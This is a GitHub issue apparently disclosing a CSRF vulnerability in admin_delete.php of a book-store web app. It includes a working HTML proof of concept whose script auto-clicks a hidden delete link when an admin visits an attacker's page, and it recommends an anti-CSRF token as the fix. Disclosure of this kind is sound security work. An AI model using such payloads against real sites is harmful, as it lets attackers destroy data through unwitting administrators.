Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book #19

Open
khanhchauminh opened this issue Oct 31, 2021 · 0 comments

Comments

@khanhchauminh
Copy link

khanhchauminh commented Oct 31, 2021

Author

KhanhCM (@khanhchauminh)

Version: 1.0

Details

The GET request for deleting a book with ISBN=12345 looks like this:

http://127.0.0.1:8888/admin_delete.php?bookisbn=12345

Changing the value of the bookisbn parameter under admin privilege will delete the book with that ISBN.
A remote attacker can embed the request into an innocent-looking hyperlink:

<a href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>

Step to reproduce

  1. First, create a malicious HTML page then host a website containing that page.

PoC:

<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <p>CSRF PoC</p>
  <a id='link' href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
  <script>
    document.getElementById('link').click();
  </script>
</body>
</html>
  1. Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via JavaScript and the book will be deleted.

Response in Burpsuite

image
image

Source code review

admin_delete.php

image

Remediation

Implement an Anti-CSRF Token.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant